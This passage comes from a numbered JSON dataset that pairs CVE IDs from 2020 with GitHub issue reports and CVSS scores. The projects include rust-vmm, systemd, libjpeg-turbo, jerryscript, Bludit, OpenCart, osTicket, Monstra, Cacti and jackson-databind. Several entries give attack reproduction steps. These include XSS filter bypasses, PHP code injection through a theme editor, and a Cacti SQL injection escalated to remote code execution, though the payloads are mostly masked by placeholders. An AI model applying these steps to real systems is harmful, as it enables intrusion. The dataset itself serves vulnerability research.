NUMBERTAG with a musl build. All VMMs using rust vmm/vm memory (any release) in a production scenario, and that take arbitrary traffic over the virtio net device, are confirmed to be at risk of a DOS. All VMMs using rust vmm/vm memory (any release) in a production scenario with a virtio net deice are under availability risk. 
All VMMs using rust vmm/vm memory (any release) in a production scenario using other devices that expect atomic reads for more than NUMBERTAG byte values may also be affected, but we are unaware of any risk for other devices (beyond the guest freezing its own virtio stack).",
  47784. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47785. "severity": "HIGH",
  47786. "baseScore": 7.5,
  47787. "impactScore": 3.6,
  47788. "exploitabilityScore": 3.9
  47789. },
  47790. {
  47791. "CVE_ID": "CVE-2020-13776",
  47792. "Issue_Url_old": "https://github.com/systemd/systemd/issues/15985",
  47793. "Issue_Url_new": "https://github.com/systemd/systemd/issues/15985",
  47794. "Repo_new": "systemd/systemd",
  47795. "Issue_Created_At": "2020-05-31T09:13:53Z",
  47796. "description": "User names beginning with NUMBERTAG being interpreted as user identifiers. Version the issue has been seen with > APITAG APITAG and master APITAG APITAG APITAG Used distribution > Ubuntu NUMBERTAG LTS Expected behaviour you didn't see > APITAG > > ERRORTAG Unexpected behaviour you saw > APITAG > > APITAG Steps to reproduce the problem NUMBERTAG Create a user whose name starts with APITAG or APITAG (_exempli gratia:_ APITAG NUMBERTAG Log in with that user name and run APITAG NUMBERTAG Check the unexpected behavior above. Related issues > Symptoms are similar to NUMBERTAG Affected code URLTAG",
  47797. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
  47798. "severity": "MEDIUM",
  47799. "baseScore": 6.7,
  47800. "impactScore": 5.9,
  47801. "exploitabilityScore": 0.8
  47802. },
  47803. {
  47804. "CVE_ID": "CVE-2020-13790",
  47805. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433",
  47806. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433",
  47807. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  47808. "Issue_Created_At": "2020-05-25T18:37:38Z",
  47809. "description": "Heap based buffer over read in APITAG in rdppm.c. Have you searched the existing issues (both open and closed) in the libjpeg turbo issue tracker to ensure that this bug report is not a duplicate? Yes Does this bug report describe one of the FILETAG ? No Clear and concise description of the bug: Heap based buffer over read in APITAG in rdppm.c Steps to reproduce the bug (using only libjpeg turbo): Compile with Address Sanitizer APITAG : ./cjpeg ./reproducer Without APITAG valgrind q ./cjpeg ./reproducer Image(s) needed in order to reproduce the bug (if applicable): FILETAG Expected behavior: Observed behavior: ERRORTAG Platform(s) (compiler version, operating system version, CPU) on which the bug was observed: gcc APITAG NUMBERTAG ubuntu NUMBERTAG Linu NUMBERTAG generic libjpeg turbo release(s), commit(s), or branch(es) in which the bug was observed (always test the tip of the master branch or the latest stable pre release URLTAG to verify that the bug hasn't already been fixed): libjpeg turbo version NUMBERTAG master) If the bug is a regression, the specific commit that introduced the regression (use git bisect to determine this): Additional information:",
  47810. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  47811. "severity": "HIGH",
  47812. "baseScore": 8.1,
  47813. "impactScore": 5.2,
  47814. "exploitabilityScore": 2.8
  47815. },
  47816. {
  47817. "CVE_ID": "CVE-2020-13822",
  47818. "Issue_Url_old": "https://github.com/indutny/elliptic/issues/226",
  47819. "Issue_Url_new": "https://github.com/indutny/elliptic/issues/226",
  47820. "Repo_new": "indutny/elliptic",
  47821. "Issue_Created_At": "2020-06-01T09:49:31Z",
  47822. "description": "Lack of encoding checks allows a certain degree of signature malleability in ECDSA signatures . Hello, Using elliptic NUMBERTAG I've found that the ECDSA verification functionality validates signatures as 'true' when the encoding is incorrect i.e. it has been modified / altered against the standard, allowing a certain degree of malleability in the signatures. Based on the Google Wycheproof test vectors, the following changes on an ECDSA signature are not detected: \"long form encoding of length of sequence\", \"length of sequence contains leading NUMBERTAG length of integer contains leading NUMBERTAG uint NUMBERTAG overflow in length of integer\", \"uint NUMBERTAG overflow in length of integer\", \"prepending NUMBERTAG s to integer\", \"long form encoding of length of integer\" See the proof of concept and test vectors below: ERRORTAG Test vectors: ERRORTAG",
  47823. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
  47824. "severity": "HIGH",
  47825. "baseScore": 7.7,
  47826. "impactScore": 5.5,
  47827. "exploitabilityScore": 2.2
  47828. },
  47829. {
  47830. "CVE_ID": "CVE-2020-13848",
  47831. "Issue_Url_old": "https://github.com/pupnp/pupnp/issues/177",
  47832. "Issue_Url_new": "https://github.com/pupnp/pupnp/issues/177",
  47833. "Repo_new": "pupnp/pupnp",
  47834. "Issue_Created_At": "2020-06-02T08:54:59Z",
  47835. "description": "NULL pointer dereference in APITAG There is a NULL pointer dereference in the function APITAG in PATHTAG A segmentation fault occurs if the string APITAG is NULL. This crash can be triggered by sending a malformed SUBSCRIBE or UNSUBSCRIBE using any of the attached files. ERRORTAG This will result in the following output using subscribe ERRORTAG and using unsubscribe ERRORTAG This was tested on the current master branch and on release NUMBERTAG Earlier versions may also be affected. FILETAG FILETAG",
  47836. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47837. "severity": "HIGH",
  47838. "baseScore": 7.5,
  47839. "impactScore": 3.6,
  47840. "exploitabilityScore": 3.9
  47841. },
  47842. {
  47843. "CVE_ID": "CVE-2020-13881",
  47844. "Issue_Url_old": "https://github.com/kravietz/pam_tacplus/issues/149",
  47845. "Issue_Url_new": "https://github.com/kravietz/pam_tacplus/issues/149",
  47846. "Repo_new": "kravietz/pam_tacplus",
  47847. "Issue_Created_At": "2020-06-02T16:40:38Z",
  47848. "description": "Printing the server secret key in plain text in journalctl. In the example, we can see that the server secret key is printed in plain text in the journalctl logs. An attacker who can read these logs and who can also observe the traffic (for example from a man-in-the-middle position) can use the secret to decrypt and read all packets; user passwords will also be exposed by that.",
  47849. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47850. "severity": "HIGH",
  47851. "baseScore": 7.5,
  47852. "impactScore": 3.6,
  47853. "exploitabilityScore": 3.9
  47854. },
  47855. {
  47856. "CVE_ID": "CVE-2020-13889",
  47857. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1205",
  47858. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1205",
  47859. "Repo_new": "bludit/bludit",
  47860. "Issue_Created_At": "2020-06-05T01:31:12Z",
  47861. "description": "Possible XSS and HTML injection on admin page. Hello, I think I found a vulnerability. This vulnerability consists in a function called APITAG in the administration panel of Bludit that, when accessed in the DOM, allows users to define the text to be popped up in the message box. But this function doesn't have any sanitization, so the user can inject arbitrary JavaScript and HTML code into the page. The payload used was: APITAG APITAG \"); FILETAG The version that I tested was Bludit NUMBERTAG I'll check the old ones for a more in-depth report. Thank you.",
  47862. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47863. "severity": "MEDIUM",
  47864. "baseScore": 5.4,
  47865. "impactScore": 2.7,
  47866. "exploitabilityScore": 2.3
  47867. },
  47868. {
  47869. "CVE_ID": "CVE-2020-13895",
  47870. "Issue_Url_old": "https://github.com/FGasper/p5-Crypt-Perl/issues/14",
  47871. "Issue_Url_new": "https://github.com/fgasper/p5-crypt-perl/issues/14",
  47872. "Repo_new": "fgasper/p5-crypt-perl",
  47873. "Issue_Created_At": "2020-06-04T10:07:35Z",
  47874. "description": "APITAG fails to verify ECDSA signatures when r and s are small and when s NUMBERTAG Hello, I'm using APITAG NUMBERTAG ERRORTAG When using the following test vectors with small r, s and s NUMBERTAG from Google Wycheproof: ERRORTAG with the prime NUMBERTAG curve, I'm getting this output: ERRORTAG which can be verified with this proof of concept: ERRORTAG Best regards, Antonio",
  47875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  47876. "severity": "HIGH",
  47877. "baseScore": 8.8,
  47878. "impactScore": 5.9,
  47879. "exploitabilityScore": 2.8
  47880. },
  47881. {
  47882. "CVE_ID": "CVE-2020-13962",
  47883. "Issue_Url_old": "https://github.com/mumble-voip/mumble/issues/3679",
  47884. "Issue_Url_new": "https://github.com/mumble-voip/mumble/issues/3679",
  47885. "Repo_new": "mumble-voip/mumble",
  47886. "Issue_Created_At": "2019-04-29T14:36:34Z",
  47887. "description": "Connection drops with Qt NUMBERTAG SSL_shutdown:shutdown while in init). Since upgrading to Qt NUMBERTAG all clients get a disconnect after about NUMBERTAG minutes of connection time. Reproducible with Qt NUMBERTAG and Qt NUMBERTAG downgrading to NUMBERTAG solves this issue. Not sure if this is a Qt bug or not, so I'm reporting it here first, although it looks like a bug in Qt. FILETAG",
  47888. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47889. "severity": "HIGH",
  47890. "baseScore": 7.5,
  47891. "impactScore": 3.6,
  47892. "exploitabilityScore": 3.9
  47893. },
  47894. {
  47895. "CVE_ID": "CVE-2020-13978",
  47896. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/464",
  47897. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/464",
  47898. "Repo_new": "monstra-cms/monstra",
  47899. "Issue_Created_At": "2020-05-22T18:06:25Z",
  47900. "description": "Remote Code Execution via Theme module. Describe the bug An attacker who is logged into the admin panel could insert arbitrary PHP code via the Theme module, which is then executed on the server (command execution). To Reproduce Log into the panel. Go to PATHTAG Click edit Insert payload APITAG Go to index view FILETAG FILETAG",
  47901. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  47902. "severity": "HIGH",
  47903. "baseScore": 7.2,
  47904. "impactScore": 5.9,
  47905. "exploitabilityScore": 1.2
  47906. },
  47907. {
  47908. "CVE_ID": "CVE-2020-13980",
  47909. "Issue_Url_old": "https://github.com/opencart/opencart/issues/7974",
  47910. "Issue_Url_new": "https://github.com/opencart/opencart/issues/7974",
  47911. "Repo_new": "opencart/opencart",
  47912. "Issue_Created_At": "2020-05-31T16:35:45Z",
  47913. "description": "Stored XSS Vulnerability in Opencart NUMBERTAG Upload Images. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the Upload Images feature: the uploaded file name is reflected into the page without proper output encoding. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to Profile NUMBERTAG Change the name of an image on the local computer to \"> APITAG .png NUMBERTAG Click upload an image NUMBERTAG Click Upload image with the payload in the name to send it to the server NUMBERTAG See the resulting XSS popup Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML-entity encode any output that is reflected back to the page, including file names. Screenshots / Screen recordings Link video POC: URLTAG Server / Test environment (please complete the following information): OS: Linux Browser: All Version NUMBERTAG",
  47914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  47915. "severity": "MEDIUM",
  47916. "baseScore": 4.8,
  47917. "impactScore": 2.7,
  47918. "exploitabilityScore": 1.7
  47919. },
  47920. {
  47921. "CVE_ID": "CVE-2020-13991",
  47922. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3860",
  47923. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3860",
  47924. "Repo_new": "jerryscript-project/jerryscript",
  47925. "Issue_Created_At": "2020-06-05T03:46:21Z",
  47926. "description": "SIGABRT in jerry_port_fatal . APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG let NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG let NUMBERTAG while NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG get:gc,set:gc}; const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG species\"]; const NUMBERTAG constructor NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG let NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG const NUMBERTAG let NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG let NUMBERTAG do { let NUMBERTAG try { const NUMBERTAG APITAG } catch NUMBERTAG const NUMBERTAG typeof NUMBERTAG const NUMBERTAG number\"; let NUMBERTAG while NUMBERTAG APITAG Execution steps PATHTAG FILETAG Output Program received signal SIGABRT, Aborted. Backtrace Program received signal SIGABRT, Aborted. 
__GI_raise (sig=sig APITAG at PATHTAG (gdb) bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff6e NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ac NUMBERTAG in jerry_port_fatal NUMBERTAG beef in jerry_fatal NUMBERTAG f NUMBERTAG d3 in ecma_ref_object NUMBERTAG cd in ecma_copy_value NUMBERTAG cf7c in vm_loop NUMBERTAG b5f6 in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG in ecma_op_function_call_simple NUMBERTAG f2d6 in ecma_op_function_call NUMBERTAG b9aa in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG e in jerry_run NUMBERTAG f NUMBERTAG df in main ()",
  47927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47928. "severity": "HIGH",
  47929. "baseScore": 7.5,
  47930. "impactScore": 3.6,
  47931. "exploitabilityScore": 3.9
  47932. },
  47933. {
  47934. "CVE_ID": "CVE-2020-13991",
  47935. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3858",
  47936. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3858",
  47937. "Repo_new": "jerryscript-project/jerryscript",
  47938. "Issue_Created_At": "2020-06-05T03:38:44Z",
  47939. "description": "SEGV in ecma_deref_ecma_string. APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"; function NUMBERTAG const NUMBERTAG return NUMBERTAG const NUMBERTAG APITAG \"species NUMBERTAG let NUMBERTAG while NUMBERTAG const NUMBERTAG APITAG } const NUMBERTAG species NUMBERTAG const NUMBERTAG let NUMBERTAG if NUMBERTAG const NUMBERTAG set NUMBERTAG const NUMBERTAG APITAG } else NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG let NUMBERTAG let NUMBERTAG while NUMBERTAG let NUMBERTAG gc; APITAG NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG Symbol NUMBERTAG const NUMBERTAG APITAG } APITAG Execution steps PATHTAG FILETAG Output APITAG Backtrace Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffd0c in ecma_deref_ecma_string () (gdb) bt NUMBERTAG ffd0c in ecma_deref_ecma_string NUMBERTAG a NUMBERTAG bb in opfunc_spread_arguments NUMBERTAG in vm_loop NUMBERTAG b5f6 in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG in ecma_op_function_call_simple NUMBERTAG f2d6 in ecma_op_function_call NUMBERTAG b9aa in vm_execute NUMBERTAG b NUMBERTAG in vm_run NUMBERTAG f NUMBERTAG e in jerry_run NUMBERTAG f NUMBERTAG df in main ().",
  47940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47941. "severity": "HIGH",
  47942. "baseScore": 7.5,
  47943. "impactScore": 3.6,
  47944. "exploitabilityScore": 3.9
  47945. },
  47946. {
  47947. "CVE_ID": "CVE-2020-13991",
  47948. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3859",
  47949. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3859",
  47950. "Repo_new": "jerryscript-project/jerryscript",
  47951. "Issue_Created_At": "2020-06-05T03:41:34Z",
  47952. "description": "SEGV in jmem_pools_finalize . APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG APITAG const NUMBERTAG APITAG let NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG gc; const NUMBERTAG APITAG } APITAG Execution steps PATHTAG FILETAG Output APITAG Backtrace Program received signal SIGSEGV, Segmentation fault NUMBERTAG bd5f in jmem_pools_finalize () (gdb) bt NUMBERTAG bd5f in jmem_pools_finalize NUMBERTAG a7bb in jmem_finalize NUMBERTAG f2ba0 in main ()",
  47953. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47954. "severity": "HIGH",
  47955. "baseScore": 7.5,
  47956. "impactScore": 3.6,
  47957. "exploitabilityScore": 3.9
  47958. },
  47959. {
  47960. "CVE_ID": "CVE-2020-14012",
  47961. "Issue_Url_old": "https://github.com/osTicket/osTicket/issues/5514",
  47962. "Issue_Url_new": "https://github.com/osticket/osticket/issues/5514",
  47963. "Repo_new": "osticket/osticket",
  47964. "Issue_Created_At": "2020-05-21T10:01:21Z",
  47965. "description": "Cross Site Scripting Vulnerability on APITAG feature in APITAG Description: An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the APITAG feature. The filtering can be bypassed by using HTML event handlers, such as \"ontoggle\". OS: firefox Steps to Reproduce NUMBERTAG Log into the panel APITAG NUMBERTAG Go to PATHTAG NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG New Category NUMBERTAG Insert the payload into Category Name or Category Description: \"> APITAG Expected behavior: FILETAG",
  47966. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47967. "severity": "MEDIUM",
  47968. "baseScore": 5.4,
  47969. "impactScore": 2.7,
  47970. "exploitabilityScore": 2.3
  47971. },
  47972. {
  47973. "CVE_ID": "CVE-2020-14042",
  47974. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1122",
  47975. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1122",
  47976. "Repo_new": "codiad/codiad",
  47977. "Issue_Created_At": "2020-06-03T15:02:11Z",
  47978. "description": "Multiple vulnerabilities that can result in RCE. Hello, Our research team in Checkmarx found multiple vulnerabilities in Codiad (XSS, CSRF, SSRF, RCE), we tried to contact the top three maintainers and none of them are active. If there are any active developers on this project feel free to contact us for more information. EMAILTAG Best regards, Yaniv.",
  47979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47980. "severity": "MEDIUM",
  47981. "baseScore": 6.1,
  47982. "impactScore": 2.7,
  47983. "exploitabilityScore": 2.8
  47984. },
  47985. {
  47986. "CVE_ID": "CVE-2020-14060",
  47987. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2688",
  47988. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2688",
  47989. "Repo_new": "fasterxml/jackson-databind",
  47990. "Issue_Created_At": "2020-04-16T15:11:49Z",
  47991. "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Topsec(tcc) from Alphalab Security Team Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  47992. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47993. "severity": "HIGH",
  47994. "baseScore": 8.1,
  47995. "impactScore": 5.9,
  47996. "exploitabilityScore": 2.2
  47997. },
  47998. {
  47999. "CVE_ID": "CVE-2020-14061",
  48000. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2698",
  48001. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2698",
  48002. "Repo_new": "fasterxml/jackson-databind",
  48003. "Issue_Created_At": "2020-04-25T02:27:29Z",
  48004. "description": "Block one more gadget type (aqjms). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Fangrun Li APITAG Security Team at Qihoo NUMBERTAG Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  48005. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48006. "severity": "HIGH",
  48007. "baseScore": 8.1,
  48008. "impactScore": 5.9,
  48009. "exploitabilityScore": 2.2
  48010. },
  48011. {
  48012. "CVE_ID": "CVE-2020-14062",
  48013. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2704",
  48014. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2704",
  48015. "Repo_new": "fasterxml/jackson-databind",
  48016. "Issue_Created_At": "2020-04-30T00:43:03Z",
  48017. "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): APITAG from Security Team of Alibaba Cloud Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  48018. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48019. "severity": "HIGH",
  48020. "baseScore": 8.1,
  48021. "impactScore": 5.9,
  48022. "exploitabilityScore": 2.2
  48023. },
  48024. {
  48025. "CVE_ID": "CVE-2020-14148",
  48026. "Issue_Url_old": "https://github.com/ngircd/ngircd/issues/277",
  48027. "Issue_Url_new": "https://github.com/ngircd/ngircd/issues/277",
  48028. "Repo_new": "ngircd/ngircd",
  48029. "Issue_Created_At": "2020-05-12T18:35:15Z",
  48030. "description": "APITAG out of bounds index access (AFL + libdislocate). I have found an out of bounds error by fuzzing ngircd using AFL and libdislocate (a custom memory allocator). APITAG is called with APITAG which leads to a crash when accessing APITAG . The binary is built from APITAG with patches to fi NUMBERTAG and NUMBERTAG and APITAG patched into APITAG in order to support APITAG . Build flags: ./configure without syslog CC=afl clang fast Run mode: ngircd n f PATHTAG Input ( FILETAG : CODETAG Stacktrace: ERRORTAG",
  48031. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48032. "severity": "HIGH",
  48033. "baseScore": 7.5,
  48034. "impactScore": 3.6,
  48035. "exploitabilityScore": 3.9
  48036. },
  48037. {
  48038. "CVE_ID": "CVE-2020-14148",
  48039. "Issue_Url_old": "https://github.com/ngircd/ngircd/issues/274",
  48040. "Issue_Url_new": "https://github.com/ngircd/ngircd/issues/274",
  48041. "Repo_new": "ngircd/ngircd",
  48042. "Issue_Created_At": "2020-05-10T16:39:55Z",
  48043. "description": "iconv related crash (AFL). I have been fuzzing ngircd using AFL a bit, based on inputs that are used in the testsuite. AFL has found input that can be used to crash a server that has been built with APITAG . My current hypothesis is that the crash happens because the APITAG context that is passed into iconv is invalid (i.e. has not been initialized at all using APITAG ). Build flags: APITAG Run mode: APITAG Input ( FILETAG : APITAG Stacktrace: CODETAG",
  48044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48045. "severity": "HIGH",
  48046. "baseScore": 7.5,
  48047. "impactScore": 3.6,
  48048. "exploitabilityScore": 3.9
  48049. },
  48050. {
  48051. "CVE_ID": "CVE-2020-14149",
  48052. "Issue_Url_old": "https://github.com/troglobit/uftpd/issues/30",
  48053. "Issue_Url_new": "https://github.com/troglobit/uftpd/issues/30",
  48054. "Repo_new": "troglobit/uftpd",
  48055. "Issue_Created_At": "2020-05-21T14:54:52Z",
  48056. "description": "Null Pointer Dereference / Crash. Hi! I found a bug that crashes the forked child before authentication, so no credentials are needed to trigger it. The details are as follows: Triggering the Bug ERRORTAG output of GDB session attached to APITAG : ERRORTAG registers CODETAG rdi is NUMBERTAG the stack trace is as follows: CODETAG the relevant source code in APITAG CODETAG APITAG so dir might be NULL but will be used in the APITAG macro with a call to APITAG . As can be seen from the stack trace APITAG and is APITAG at this point, which causes the crash. To force APITAG we can look at APITAG in APITAG which calls APITAG here APITAG and APITAG returns the pointer at the end of the function: CODETAG So we have to look at APITAG in APITAG . The trace that leads to APITAG is the following: CODETAG Best Martin",
  48057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48058. "severity": "HIGH",
  48059. "baseScore": 7.5,
  48060. "impactScore": 3.6,
  48061. "exploitabilityScore": 3.9
  48062. },
  48063. {
  48064. "CVE_ID": "CVE-2020-14153",
  48065. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445",
  48066. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/445",
  48067. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  48068. "Issue_Created_At": "2020-07-27T14:47:40Z",
  48069. "description": "Is CVETAG present in libjpeg turbo?. URLTAG URLTAG My best guess is that this is fixed in the following change in jpeg NUMBERTAG d: CODETAG Is this any vulnerability that is or was present in libjpeg turbo?",
  48070. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  48071. "severity": "HIGH",
  48072. "baseScore": 7.1,
  48073. "impactScore": 5.2,
  48074. "exploitabilityScore": 1.8
  48075. },
  48076. {
  48077. "CVE_ID": "CVE-2020-14163",
  48078. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3804",
  48079. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3804",
  48080. "Repo_new": "jerryscript-project/jerryscript",
  48081. "Issue_Created_At": "2020-05-27T18:29:22Z",
  48082. "description": "Memory corruption in ecma_gc_set_object_visited ( PATHTAG ). APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG and APITAG Mac OS X APITAG NUMBERTAG APITAG NUMBERTAG E NUMBERTAG Build steps CODETAG ERRORTAG Test case to reproduce the bug for this APITAG keep the same filename length and run the interpreter providing the basename only, as in the Execution steps below. filename: APITAG ERRORTAG Execution steps ERRORTAG ERRORTAG Backtrace ERRORTAG",
  48083. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  48084. "severity": "HIGH",
  48085. "baseScore": 7.5,
  48086. "impactScore": 3.6,
  48087. "exploitabilityScore": 3.9
  48088. },
  48089. {
  48090. "CVE_ID": "CVE-2020-14195",
  48091. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2765",
  48092. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2765",
  48093. "Repo_new": "fasterxml/jackson-databind",
  48094. "Issue_Created_At": "2020-06-13T23:22:50Z",
  48095. "description": "Block one more gadget type ( ). Another gadget type(s) reported regarding class(es) of [TO BE DISCLOSED ONCE FIXED]. library. See URLTAG for description of the general problem. Mitre id: Reporter(s): Al1ex MENTIONTAG Fix will likely be included in NUMBERTAG Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  48096. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48097. "severity": "HIGH",
  48098. "baseScore": 8.1,
  48099. "impactScore": 5.9,
  48100. "exploitabilityScore": 2.2
  48101. },
  48102. {
  48103. "CVE_ID": "CVE-2020-14295",
  48104. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3622",
  48105. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3622",
  48106. "Repo_new": "cacti/cacti",
  48107. "Issue_Created_At": "2020-06-17T07:02:46Z",
  48108. "description": "FILETAG Expected behavior change the following lines : URLTAG CODETAG You should do APITAG instead of '%\" . get_request_var('filter') . \"%. Additional context As the application accept stacked queries, this can easy lead to remote code execution by replacing the path_php_binary setting inside the database. ERRORTAG Then call APITAG and get the shell_exec called with the path_php_binary. FILETAG",
  48109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  48110. "severity": "HIGH",
  48111. "baseScore": 7.2,
  48112. "impactScore": 5.9,
  48113. "exploitabilityScore": 1.2
  48114. },
  48115. {
  48116. "CVE_ID": "CVE-2020-14330",
  48117. "Issue_Url_old": "https://github.com/ansible/ansible/issues/68400",
  48118. "Issue_Url_new": "https://github.com/ansible/ansible/issues/68400",
  48119. "Repo_new": "ansible/ansible",
  48120. "Issue_Created_At": "2020-03-23T11:01:05Z",
